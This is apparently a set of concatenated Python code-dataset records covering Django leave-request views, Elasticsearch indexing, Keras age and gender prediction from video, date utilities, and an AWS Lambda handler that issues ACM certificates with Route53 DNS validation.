if self.request.user.is_superuser:\n return self.model.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n else:\n raise Http404()\n\nclass LeaveAppliedUserListView(LoginRequiredMixin,ListView,BaseException):\n model = models.LeaveApply\n template_name = 'leave/leave_apply_list.html'\n\n def get_queryset(self):\n if self.kwargs.get('username') == self.request.user.username:\n return self.model.objects.filter(user__username__iexact=self.kwargs.get('username'),published_date__lte=timezone.now()).order_by('-published_date')\n else:\n raise Http404()\n\nclass LeaveDraftListView(LoginRequiredMixin,ListView,BaseException):\n model = models.LeaveApply\n template_name = 'leave/leave_apply_list.html'\n\n def get_queryset(self):\n if self.kwargs.get('username') == self.request.user.username:\n return self.model.objects.filter(user__username__iexact=self.kwargs.get('username'),published_date__isnull=True).order_by('created_date')\n else:\n raise Http404()\n\nclass LeaveApplyUpdateView(LoginRequiredMixin,UpdateView):\n model = models.LeaveApply\n fields = ('leave_type','start_date','end_date','notes','tag_to')\n template_name = 'leave/leave_apply_form.html'\n # success_url = reverse_lazy(\"leave:detail\" pk=leaverules.pk)\n success_url = reverse_lazy(\"leave:applied\")\n\nclass LeaveApplyDeleteView(LoginRequiredMixin,DeleteView):\n model = models.LeaveApply\n success_url = reverse_lazy(\"leave:applied\")\n\ndef leave_send_mails(request,leave_id):\n model = models.LeaveApply\n start_date = datetime.strptime(request.POST['start_date'], '%d/%m/%Y').strftime('%Y-%m-%d')\n end_date = datetime.strptime(request.POST['end_date'], '%d/%m/%Y').strftime('%Y-%m-%d')\n user_leave_history = model.objects.filter(user__username__iexact=request.user.username,published_date__lte=timezone.now()).exclude(pk=leave_id). extra(select={\\\n 'month': \"EXTRACT(month FROM published_date)\",\n 'year': \"EXTRACT(year FROM published_date)\",\n }).\\\n values('month', 'year').\\\n annotate(count_items=Count('published_date')).order_by('-published_date')\n print (\"month,count,total\")\n total = 0\n for item in user_leave_history:\n total = total + item['count_items']\n if item['year'] < 2018: continue\n print (\"%02d-%s,%s,%s\" % (item['month'], item['year'], item['count_items'], total))\n others_leave_history = model.objects.filter(published_date__range=(start_date, end_date)).exclude(user__username__iexact=request.user.username).order_by('-published_date')\n superusers = models.User.objects.filter(is_superuser=True)\n recipient_list = request.POST['tag_to']\n for suser in superusers:\n if suser.email not in recipient_list:\n if request.user.email not in suser.email:\n recipient_list += suser.email\n\n recipient_list = list(set(recipient_list.split(\",\")))\n\n current_site = get_current_site(request)\n subject = 'Leave request'\n\n for rlist in recipient_list:\n if rlist.strip():\n message = render_to_string('leave/leave_request_email.html', {\n 'domain': current_site.domain,\n 'user': request.user,\n 'leave_details': request.POST,\n 'user_history': user_leave_history,\n 'other_history': others_leave_history,\n 'Approved': urlsafe_base64_encode(force_bytes('Approved')).decode(),\n 'Declined': urlsafe_base64_encode(force_bytes('Declined')).decode(),\n 'uidb64': urlsafe_base64_encode(force_bytes(request.user.pk)).decode(),\n 'lidb64': urlsafe_base64_encode(force_bytes(leave_id)).decode(),\n 'approve_by': urlsafe_base64_encode(force_bytes(rlist)).decode(),\n 'token': default_token_generator.make_token(request.user)\n })\n print(message)\n email = EmailMessage(subject, message, \"sathishkumar@appinessworld.com\", [rlist])\n email.content_subtype = \"html\"\n res = email.send()\n return HttpResponse('%s'%res)\n\ndef status(request,status,approve_by, uidb64, lidb64, token):\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = models.User.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, models.User.DoesNotExist):\n user = None\n try:\n lid = force_text(urlsafe_base64_decode(lidb64))\n leave = models.LeaveApply.objects.get(pk=lid)\n except (TypeError, ValueError, OverflowError, models.LeaveApply.DoesNotExist):\n leave = None\n if user and default_token_generator.check_token(user, token):\n status = force_text(urlsafe_base64_decode(status))\n approved_email = force_text(urlsafe_base64_decode(approve_by))\n status_by = models.User.objects.get(email=approved_email)\n\n leave.status = status\n leave.status_by = status_by.first_name\n leave.save()\n flag = leave_status_mails(request,user,leave,approved_email)\n validlink = {'validlink':True}\n return render(request, 'leave/leave_status.html',context=validlink)\n else:\n return render(request, 'leave/leave_status.html',{'validlink': False})\n\ndef leave_status_mails(request,user,leave,approved_email):\n superusers = models.User.objects.filter(is_superuser=True)\n recipient_list = leave.tag_to\n for suser in superusers:\n if suser.email not in recipient_list:\n if user.email not in suser.email:\n recipient_list += suser.email\n\n recipient_list += user.email\n\n recipient_list = list(set(recipient_list.split(\",\")))\n\n current_site = get_current_site(request)\n subject = 'Leave status'\n\n for rlist in recipient_list:\n if rlist.strip():\n if rlist not in approved_email:\n message = render_to_string('leave/leave_status_email.html', {\n 'domain': current_site.domain,\n 'user': user,\n 'leave_details': leave,\n })\n print(message)\n email = EmailMessage(subject, message, \"sathishkumar@appinessworld.com\", [rlist])\n email.content_subtype = \"html\"\n res = email.send()\n return HttpResponse('%s'%res)\n\ndef leave_status(request):\n approved_email = request.GET.get('approved_email')\n data = request.GET.get('data').split(\",\")\n try:\n user_id = data[2]\n user = models.User.objects.get(pk=user_id)\n except (TypeError, ValueError, OverflowError, models.User.DoesNotExist):\n user = None\n try:\n leave_id = data[1]\n leave = models.LeaveApply.objects.get(pk=leave_id)\n except (TypeError, ValueError, OverflowError, models.LeaveApply.DoesNotExist):\n leave = None\n\n if user and leave:\n status = data[0]\n status_by = models.User.objects.get(email=approved_email)\n\n leave.status = status\n leave.status_by = status_by.first_name\n leave.save()\n flag = leave_status_mails(request,user,leave,approved_email)\n updated = True\n else:\n updated = False\n data = {\n 'is_taken': updated\n }\n return JsonResponse(data)\n","sub_path":"alms/leave/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"199337550","text":"\"\"\"这个采用多线程的方式,虽说是能提高性能,但是速度比不上多进程\n\"\"\"\n# encoding=utf-8\nimport sys\nimport os\nimport logging\nimport timeit\nimport multiprocessing\nfrom multiprocessing import Pool, cpu_count\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import parallel_bulk, streaming_bulk\n\nfrom ..utils.file_utils import get_files\n\nlog_console = logging.StreamHandler(sys.stderr)\ndefault_logger = logging.getLogger(__name__)\ndefault_logger.setLevel(logging.DEBUG)\ndefault_logger.addHandler(log_console)\n\n# bulk单次的doc数量\nbulk_count = 500\n\n# 多少记录汇报一次\nreport_count = 20000\n\n# 并发数量\nprocess_count = cpu_count()\n\n\n# 创建索引时使用的配置,创建后要修改这个配置\nindex_config = {\n 'settings': {\n \"refresh_interval\": \"-1\",\n \"merge.policy.max_merged_segment\": \"1000mb\",\n \"translog.durability\": \"async\",\n \"translog.flush_threshold_size\": \"2gb\",\n \"translog.sync_interval\": \"100s\",\n \"analysis\": {\n \"filter\": {\n \"jieba_stop\": {\n \"type\": \"stop\",\n \"stopwords_path\": \"stopwords/stopwords.txt\"\n },\n \"jieba_synonym\": {\n \"type\": \"synonym\",\n \"synonyms_path\": \"synonyms/synonyms.txt\",\n \"lenient\": True\n }\n },\n \"analyzer\": {\n \"jieba_index_analyzer\": {\n \"tokenizer\": \"jieba_index\",\n \"filter\": [\n \"lowercase\",\n \"jieba_stop\" # ,\n # \"jieba_synonym\"\n ]\n },\n \"jieba_index_all_analyzer\": {\n \"tokenizer\": \"jieba_index_all\",\n \"filter\": [\n \"lowercase\",\n \"jieba_stop\" # ,\n # \"jieba_synonym\"\n ]\n }\n }\n }\n },\n \"mappings\": {\n \"properties\": {\n \"subject\": {\n \"type\": \"text\",\n \"analyzer\": \"jieba_search\",\n \"store\": True,\n \"copy_to\": \"search_field\"\n },\n \"predicate\": {\n \"type\": \"keyword\"\n },\n \"object\": {\n \"type\": \"text\",\n \"store\": True,\n \"analyzer\": \"jieba_index_analyzer\",\n \"copy_to\": \"search_field\"\n },\n \"search_field\": {\n \"type\": \"text\",\n \"analyzer\": \"jieba_index_all_analyzer\"\n }\n }\n }\n}\n\nindex_config_after = {\n 'settings': {\n \"refresh_interval\": \"30s\",\n }\n}\n\n\ndef triple_index_create(indexname='triple', data=None, overwrite=False):\n \"\"\"创建三元组的索引\n \"\"\"\n # 初始化ES\n es = get_es_client()\n if es.indices.exists(indexname):\n default_logger.info(\"索引{}已经存在了\".format(indexname))\n if overwrite:\n # 如果是覆盖,那么就删除原来的\n es.indices.delete(index=indexname)\n default_logger.info(\"删除索引:{}\".format(indexname))\n ret = es.indices.create(index=indexname, body=index_config)\n default_logger.info(\"创建索引,返回结果:{}\".format(ret))\n else:\n ret = es.indices.create(index=indexname, body=index_config)\n default_logger.info(\"创建索引,返回结果:{}\".format(ret))\n start = timeit.default_timer()\n write_doc_parallel(es, indexname, data)\n end = timeit.default_timer()\n default_logger.info(\"完成索引的创建,共耗时:{}\".format(end - start))\n es.indices.put_settings(index=indexname, body=index_config_after)\n\n\ndef get_es_client():\n \"\"\"获取ES Client\n \"\"\"\n return Elasticsearch(timeout=60, max_retries=10, retry_on_timeout=True)\n\n\ndef write_doc_parallel(es, indexname, data_dir):\n \"\"\"并发创建索引\n \"\"\"\n start = timeit.default_timer()\n actions_iter = get_actions_iterator(indexname, data_dir)\n # ret = parallel_bulk(es, actions_iter, thread_count=process_count,\n # chunk_size=bulk_count, queue_size=process_count*2)\n ret = streaming_bulk(es, actions_iter, chunk_size=bulk_count,\n max_retries=10, request_timeout=10000)\n count = 0\n for ok, info in ret:\n count += 1\n if count > 0 and count % report_count == 0:\n end = timeit.default_timer()\n default_logger.info(\"完成{}行,耗时{}\".format(count, end - start))\n if not ok:\n default_logger.info(\"出现错误:{}\".format(info))\n end = timeit.default_timer()\n default_logger.info(\"完成{}行,耗时{}\".format(count, end - start))\n\n\ndef get_actions_iterator(indexname, data_dir):\n \"\"\"获取actions的迭代器\n \"\"\"\n count = 0\n files = get_files(data_dir)\n\n start = timeit.default_timer()\n for file in files:\n with open(file, mode='r', encoding='utf8') as f:\n for line in f:\n fields = line.split('\\t')\n if len(fields) == 3:\n count += 1\n action = _build_action(indexname=indexname,\n subject=fields[0].strip(),\n predicate=fields[1].strip(),\n object=fields[2].strip())\n yield action\n\n\ndef _build_action(indexname, subject, predicate, object):\n \"\"\"创建一个bulk使用的action\n \"\"\"\n action = {\n '_index': indexname,\n '_op_type': 'index', # 这个操作表示索引文档\n '_source': {\n 'subject': subject,\n 'predicate': predicate,\n 'object': object\n }\n }\n\n return action\n","sub_path":"entitylinking/index_elasticsearch/triple_index_creator_new.py","file_name":"triple_index_creator_new.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"647218638","text":"#Usar\r\n#python Keras_10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil_03_video.py\r\n\r\n#Documentation: https://sefiks.com/2019/02/13/apparent-age-and-gender-prediction-in-keras/\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom keras.models import Model, Sequential\r\nfrom keras.layers import Input, Convolution2D, ZeroPadding2D, MaxPooling2D, Flatten, Dense, Dropout, Activation\r\nfrom PIL import Image\r\nfrom keras.preprocessing.image import load_img, save_img, img_to_array\r\nfrom keras.applications.imagenet_utils import preprocess_input\r\nfrom keras.preprocessing import image\r\nfrom keras.models import model_from_json\r\nimport matplotlib.pyplot as plt\r\n\r\n### Keras 2.3.0 e TensorFlow 2.0\r\nimport tensorflow as tf\r\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\r\nprint(\"physical_devices-------------\", len(physical_devices))\r\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\r\n### Keras 2.3.0 e TensorFlow 2.0\r\n\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\r\n\r\ndef preprocess_image(image_path):\r\n img = load_img(image_path, target_size=(224, 224))\r\n img = img_to_array(img)\r\n img = np.expand_dims(img, axis=0)\r\n img = preprocess_input(img)\r\n return img\r\n\r\ndef loadVggFaceModel():\r\n model = Sequential()\r\n model.add(ZeroPadding2D((1,1),input_shape=(224,224, 3)))\r\n model.add(Convolution2D(64, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(64, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(128, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(128, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(256, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(256, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(256, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(ZeroPadding2D((1,1)))\r\n model.add(Convolution2D(512, (3, 3), activation='relu'))\r\n model.add(MaxPooling2D((2,2), strides=(2,2)))\r\n\r\n model.add(Convolution2D(4096, (7, 7), activation='relu'))\r\n model.add(Dropout(0.5))\r\n model.add(Convolution2D(4096, (1, 1), activation='relu'))\r\n model.add(Dropout(0.5))\r\n model.add(Convolution2D(2622, (1, 1)))\r\n model.add(Flatten())\r\n model.add(Activation('softmax'))\r\n \r\n return model\r\n\r\ndef ageModel():\r\n model = loadVggFaceModel()\r\n \r\n base_model_output = Sequential()\r\n base_model_output = Convolution2D(101, (1, 1), name='predictions')(model.layers[-4].output)\r\n base_model_output = Flatten()(base_model_output)\r\n base_model_output = Activation('softmax')(base_model_output)\r\n \r\n age_model = Model(inputs=model.input, outputs=base_model_output)\r\n \r\n #you can find the pre-trained weights for age prediction here: https://drive.google.com/file/d/1YCox_4kJ-BYeXq27uUbasu--yz28zUMV/view?usp=sharing\r\n age_model.load_weights(\"age_model_weights.h5\")\r\n \r\n return age_model\r\n\r\ndef genderModel():\r\n model = loadVggFaceModel()\r\n \r\n base_model_output = Sequential()\r\n base_model_output = Convolution2D(2, (1, 1), name='predictions')(model.layers[-4].output)\r\n base_model_output = Flatten()(base_model_output)\r\n base_model_output = Activation('softmax')(base_model_output)\r\n\r\n gender_model = Model(inputs=model.input, outputs=base_model_output)\r\n \r\n #you can find the pre-trained weights for gender prediction here: https://drive.google.com/file/d/1wUXRVlbsni2FN9-jkS_f4UTUrm1bRLyk/view?usp=sharing\r\n gender_model.load_weights(\"gender_model_weights.h5\")\r\n \r\n return gender_model\r\n \r\nage_model = ageModel()\r\ngender_model = genderModel()\r\n\r\n#age model has 101 outputs and its outputs will be multiplied by its index label. sum will be apparent age\r\noutput_indexes = np.array([i for i in range(0, 101)])\r\n\r\n#------------------------\r\n\r\ncap = cv2.VideoCapture('Gigante_no_Mic_Apendice.mp4')\r\n#cap = cv2.VideoCapture(0)\r\nstop = 0\r\nret=True\r\n\r\nwhile (ret==True):\r\n\tif (stop==0):\r\n\t\tret, img = cap.read()\r\n\t\tif (ret == True):\r\n\t\t\timg = cv2.resize(img,None,fx=0.5,fy=0.5)\r\n\t\t\tfaces = face_cascade.detectMultiScale(img, 1.13, 5)\r\n\t\t\tfor (x,y,w,h) in faces:\r\n\t\t\t\tif w > 130: #ignore small faces\r\n\t\t\t\t\tdetected_face = img[int(y):int(y+h), int(x):int(x+w)] #crop detected face\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\t#age gender data set has 40% margin around the face. expand detected face.\r\n\t\t\t\t\t\tmargin = 30\r\n\t\t\t\t\t\tmargin_x = int((w * margin)/100)\r\n\t\t\t\t\t\tmargin_y = int((h * margin)/100)\r\n\t\t\t\t\t\tdetected_face = img[int(y-margin_y):int(y+h+margin_y), int(x-margin_x):int(x+w+margin_x)]\r\n\t\t\t\t\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(\"detected face has no margin\")\r\n\t\t\t\t\t\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\t#vgg-face expects inputs (224, 224, 3)\r\n\t\t\t\t\t\tdetected_face = cv2.resize(detected_face, (224, 224))\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\timg_pixels = image.img_to_array(detected_face)\r\n\t\t\t\t\t\timg_pixels = np.expand_dims(img_pixels, axis = 0)\r\n\t\t\t\t\t\timg_pixels /= 255\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t#find out age and gender\r\n\t\t\t\t\t\tage_distributions = age_model.predict(img_pixels)\r\n\t\t\t\t\t\tapparent_age = str(int(np.floor(np.sum(age_distributions * output_indexes, axis = 1))[0]))\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tgender_distribution = gender_model.predict(img_pixels)[0]\r\n\t\t\t\t\t\tgender_index = np.argmax(gender_distribution)\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif gender_index == 0: gender = \"Female\"\r\n\t\t\t\t\t\telse: gender = \"Male\"\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tcv2.rectangle(img,(x,y),(x+w,y+h),(255,255,255),5)\r\n\t\t\t\t\t\t#labels for age and gender\r\n\t\t\t\t\t\tcv2.putText(img, apparent_age, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,255,0), 10)\r\n\t\t\t\t\t\tcv2.putText(img, apparent_age, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,0,0), 3)\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tcv2.putText(img, str(gender), (x, y+w), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,255,0), 10)\r\n\t\t\t\t\t\tcv2.putText(img, str(gender), (x, y+w), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (0,0,0), 3)\r\n\t\t\t\t\t\tcv2.imshow(\"Detected face\", detected_face)\t\t \r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint(\"exception\",str(e))\r\n\t\t\t\t\t\r\n\t\t\t\t\tcv2.imshow(\"Output\", img)\r\n\tkey = cv2.waitKey(1) & 0xFF\r\n\tif key == ord('s'):\r\n\t\tstop = not(stop)\r\n\tif key == ord('q'):\r\n\t\tbreak\r\ncv2.destroyAllWindows()\r\n","sub_path":"10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil/Keras_10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil_03_video.py","file_name":"Keras_10_Age_and_Gender_Prediction_VGG-Face_Sefik_Serengil_03_video.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"368755135","text":"from datetime import timedelta\nimport datetime\nimport time\n\nfrom django.utils import timezone\nfrom pytz import tzinfo\nimport pytz\n\nfrom cr_review_sys.errors import DateTimeFormatInvalid\n\n\nclass DateHelper(object):\n\n @staticmethod\n def calculate_mtk_week(time):\n '''\n Get MTK week for now,\n Return type is int or None\n '''\n try:\n if time:\n temp_result = time.isocalendar()\n now_year = temp_result[0]\n final_week = temp_result[1]\n return (now_year, final_week + 1) if temp_result[2] == 7 else (now_year, final_week)\n else:\n return (None, None)\n except Exception:\n return (None, None)\n\n @staticmethod\n def get_days_from_specific_date(submit_date):\n '''\n Calculate day intervals between now and particular date, ex. submit date/resolved date, etc,\n Return type is int\n (add if check to in case of sync data exception from WITS(CQ)\n '''\n return (datetime.datetime.now().date() - submit_date.date()).days if submit_date else 0\n\n @staticmethod\n def is_will_kickoff_prj_in_one_mon(start_date):\n '''\n Calculate start date with now to check whether this prj belongs to will kick off prj or not\n Return boolean, True is the prj will kick off in one month (31 days)\n '''\n day_interval = (start_date.date() -\n datetime.datetime.now().date()).days\n return True if 0 < day_interval < 32 else False\n\n @staticmethod\n def get_year_datetime_for_query(from_year, to_year):\n '''\n Transfer year to datetime for query condition,\n Ex. From year: 2014, To year: 2017,\n return result will be\n from_datetime = datetime.datetime(2014, 1, 1, 00, 00, 00)\n to_datetime = datetime.datetime(2017, 12, 31, 23, 59, 59)\n Return (from_datetime, to_datetime)\n '''\n from_datetime = None\n to_datetime = None\n\n if not(from_year and to_year) or from_year > to_year:\n return (from_datetime, to_datetime)\n int_from_year = int(from_year)\n int_to_year = int(to_year)\n\n from_datetime = datetime.datetime(int_from_year, 1, 1)\n to_datetime = datetime.datetime(int_to_year, 12, 31, 23, 59, 59)\n\n return (from_datetime, to_datetime)\n\n @staticmethod\n def get_new_sync_job_id(db):\n new_sync_job_id = db + time.strftime(\"%Y%m%d%H%M%S\")\n return new_sync_job_id\n\n @staticmethod\n def get_local_time(time):\n local_time = None\n if time:\n local_time = timezone.template_localtime(time)\n return local_time\n return time\n\n @staticmethod\n def get_current_time_str():\n cur_time_str = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n return cur_time_str\n\n @staticmethod\n def get_gmt_for_input_time(input_time, tz=None):\n '''\n transfer str to datetime with timezone\n str format: %Y-%m-%d %H:%M:%S\n default is use GMT-8, setup tz if needed\n '''\n result = None\n tz = tz if tz else \"Etc/GMT-8\"\n tzinfo = pytz.timezone(tz)\n\n try:\n result = datetime.datetime.strptime(\n input_time, \"%Y-%m-%d %H:%M:%S\").replace(tzinfo=tzinfo)\n except Exception:\n raise DateTimeFormatInvalid()\n\n return result\n\n @staticmethod\n def get_localtime_from_db(db_time, tz=None, str_format=None):\n '''\n transfer db datetime to str\n str_format could define format, default is \"%Y-%m-%d %H:%M:%S\"\n '''\n result = None\n str_format = str_format if str_format else \"%Y-%m-%d %H:%M:%S\"\n loca_time_delta = timedelta(hours=8)\n new_time = db_time + loca_time_delta\n\n try:\n result = new_time.strftime(str_format)\n except Exception:\n raise Exception()\n\n return result\n\n @staticmethod\n def get_today(str_format=None):\n result = None\n str_format = str_format if str_format else \"%Y%m%d\"\n\n try:\n result = datetime.datetime.now().strftime(str_format)\n except Exception:\n raise DateTimeFormatInvalid()\n\n return result\n\n @staticmethod\n def datetime_to_str(ori_time, str_format=None):\n str_format = str_format if str_format else \"%Y-%m-%d %H:%M:%S\"\n return ori_time.strftime(str_format)\n\n @staticmethod\n def datetime_set_tz(ori_time, tz=None):\n result = None\n tz = tz if tz else \"Etc/GMT\"\n tzinfo = pytz.timezone(tz)\n\n if ori_time:\n result = ori_time.replace(tzinfo=tzinfo)\n return result\n","sub_path":"my_to_do/util/date_helper.py","file_name":"date_helper.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"79782451","text":"g=input()\ng=g.split()\nz1=int(g[0])\nz2=int(g[1])\nq=input()\nq=q.split()\nd=0\nl1=[]\nl2=[]\nfor i in g:\n l1.append(int(i))\nfor j in q:\n l2.append(j)\nif(z2<=z1):\n for i in range(0,z2):\n d=d+int(l2[i])\nprint(d)\n \n","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"623368510","text":"\"\"\"\nLambda function backing cloudformation certificate resource\n\nPost-minification, this module must be less than 4KiB.\n\n\"\"\"\n\nimport copy\nimport hashlib\nimport json\nimport logging\nimport time\n\nfrom boto3 import client\nfrom botocore.exceptions import ClientError, ParamValidationError\nfrom urllib.request import Request, urlopen\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nlog_info = logger.info\nlog_exception = logger.exception\nshallow_copy = copy.copy\nsleep = time.sleep\n\njson_dumps = lambda j: json.dumps(j, sort_keys=True).encode()\n\nREINVOKED = 'R'\n\ndef handler(e, c): # handler(event, context, /)\n \"\"\"\n Cloudformation custom resource handler\n\n :param e: lambda event payload\n :param c: lambda execution context\n\n \"\"\"\n\n get_remaining_time_in_millis = c.get_remaining_time_in_millis\n\n log_info(e)\n\n def request_cert():\n \"\"\"\n Create a certificate\n\n This create an ACM certificate and update the event payload with the PhysicalResourceId.\n The certificate will not yet be issued.\n\n \"\"\"\n\n api_request = shallow_copy(props)\n\n for key in ['ServiceToken', 'Region', 'Tags', 'Route53RoleArn']:\n api_request.pop(key, None)\n\n if 'ValidationMethod' in props:\n if props['ValidationMethod'] == 'DNS':\n\n # Check that we have all the hosted zone information we need to validate\n # before we create the certificate\n for name in set([props['DomainName']] + props.get('SubjectAlternativeNames', [])):\n get_zone_for(name)\n\n del api_request['DomainValidationOptions']\n\n e['PhysicalResourceId'] = acm.request_certificate(\n IdempotencyToken=i_token,\n **api_request\n )['CertificateArn']\n add_tags()\n\n def delete_certificate(a): # delete_certificate(arn, /)\n \"\"\"\n Delete a certificate\n\n Attempts to delete a certificate.\n\n :param str a: Arn of the certificate to delete\n\n \"\"\"\n\n while True:\n\n try:\n acm.delete_certificate(**{'CertificateArn': a})\n return\n except ClientError as exception:\n log_exception('')\n\n err_code = exception.response['Error']['Code']\n\n if err_code == 'ResourceInUseException':\n if get_remaining_time_in_millis() / 1000 < 30:\n raise\n\n sleep(5)\n continue\n\n if err_code in ['ResourceNotFoundException', 'ValidationException']:\n # If the arn is invalid, it didn't exist anyway.\n return\n\n raise\n\n except ParamValidationError:\n # invalid arn\n return\n\n def find_certificate(p): # find_certificate(props, /)\n \"\"\"\n Find a certificate that belongs to this stack\n\n If the certificate is not found, returns None.\n\n :param dict p: The properties of the certificate to find\n :returns: The arn of the certificate\n :rtype: str or None\n\n \"\"\"\n\n for page in acm.get_paginator('list_certificates').paginate():\n for certificate in page['CertificateSummaryList']:\n log_info(certificate)\n\n if p['DomainName'].lower() == certificate['DomainName']:\n tags = {tag['Key']: tag['Value'] for tag in\n acm.list_tags_for_certificate(**{'CertificateArn': certificate['CertificateArn']})['Tags']}\n\n if (tags.get('cloudformation:' + 'logical-id') == e['LogicalResourceId'] and\n tags.get('cloudformation:' + 'stack-id') == e['StackId'] and\n tags.get('cloudformation:' + 'properties') == hash_func(p)\n ):\n return certificate['CertificateArn']\n\n def reinvoke():\n \"\"\"\n Reinvoke this lambda\n\n The time to issue a certificate may be more than the lambda can execute for.\n This reinvokes this lambda to continue waiting.\n\n If this lambda has itself been reinvoked, instead raise a RuntimeError.\n\n \"\"\"\n\n # Only Reinvoke once, which is a total of 30 minutes running\n if REINVOKED in e:\n raise RuntimeError('Certificate not issued in time')\n\n e[REINVOKED] = REINVOKED\n\n log_info(e)\n client('lambda').invoke(\n FunctionName=c.invoked_function_arn,\n InvocationType='Event',\n Payload=json_dumps(e)\n )\n\n def wait_for_issuance():\n \"\"\"\n Wait until a certificate is issued\n\n Returns True when issued, False when lambda execution time is up.\n If the certificate fails to issue, a RuntimeError is raised\n\n :rtype: bool\n\n \"\"\"\n\n while (get_remaining_time_in_millis() / 1000) > 30:\n\n cert = acm.describe_certificate(**{'CertificateArn': e['PhysicalResourceId']})['Certificate']\n log_info(cert)\n\n if cert['Status'] == 'ISSUED':\n return True\n elif cert['Status'] == 'FAILED':\n raise RuntimeError(cert.get('FailureReason', ''))\n\n sleep(5)\n\n return False\n\n def replace_cert():\n \"\"\"\n Does the update require replacement of the certificate?\n\n Only tags can be updated without replacement\n\n :rtype: bool\n\n \"\"\"\n\n old = shallow_copy(e['Old' + 'ResourceProperties'])\n old.pop('Tags', None)\n\n new = shallow_copy(e['ResourceProperties'])\n new.pop('Tags', None)\n\n return old != new\n\n def validate():\n \"\"\"\n Add DNS validation records for a certificate\n\n \"\"\"\n\n if props.get('ValidationMethod') != 'DNS':\n return\n\n while True:\n cert = acm.describe_certificate(**{'CertificateArn': e['PhysicalResourceId']})['Certificate']\n log_info(cert)\n\n if cert['Status'] != 'PENDING_VALIDATION':\n return\n\n if not [\n validation_option\n for validation_option in cert.get('DomainValidationOptions', [{}])\n if 'ValidationStatus' not in validation_option\n or 'ResourceRecord' not in validation_option\n ]:\n # All validation options have a status and resource record to create\n break\n\n sleep(1)\n\n for validation_option in cert['DomainValidationOptions']:\n\n if validation_option['ValidationStatus'] == 'PENDING_VALIDATION':\n hosted_zone = get_zone_for(validation_option['DomainName'])\n\n role_arn = hosted_zone.get('Route53RoleArn', props.get('Route53RoleArn'))\n\n sts = client('sts').assume_role(\n RoleArn=role_arn,\n RoleSessionName=('Certificate' + e['LogicalResourceId'])[:64],\n DurationSeconds=900,\n )['Credentials'] if role_arn is not None else {}\n\n route53 = client('route53',\n aws_access_key_id=sts.get('AccessKeyId'),\n aws_secret_access_key=sts.get('SecretAccessKey'),\n aws_session_token=sts.get('SessionToken'),\n ).change_resource_record_sets(**{\n 'HostedZoneId': hosted_zone['HostedZoneId'],\n 'ChangeBatch': {\n 'Comment': 'Domain validation for ' + e['PhysicalResourceId'],\n 'Changes': [{\n 'Action': 'UPSERT',\n 'ResourceRecordSet': {\n 'Name': validation_option['ResourceRecord']['Name'],\n 'Type': validation_option['ResourceRecord']['Type'],\n 'TTL': 60,\n 'ResourceRecords': [{'Value': validation_option['ResourceRecord']['Value']}],\n },\n }],\n }},\n )\n\n log_info(route53)\n\n def get_zone_for(n): # get_zone_for(name, /)\n \"\"\"\n Return the hosted zone to use for validating a name\n\n :param str n: The name to validate\n :rtype: dict\n\n 